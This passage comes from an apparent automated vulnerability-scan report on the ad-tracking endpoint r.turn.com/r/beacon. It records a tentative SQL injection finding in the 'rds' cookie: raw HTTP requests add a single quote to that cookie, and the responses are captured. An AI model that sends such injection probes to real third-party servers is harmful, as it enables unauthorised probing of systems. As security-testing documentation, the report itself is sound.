YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHs
yGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; 
pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr3
6hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:45 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:45 GMT


1.12. http://r.turn.com/r/beacon [rds cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The rds cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rds cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHs
yGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; 
pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr3
6hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138'; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:22 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:22 GMT

Request 2

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZa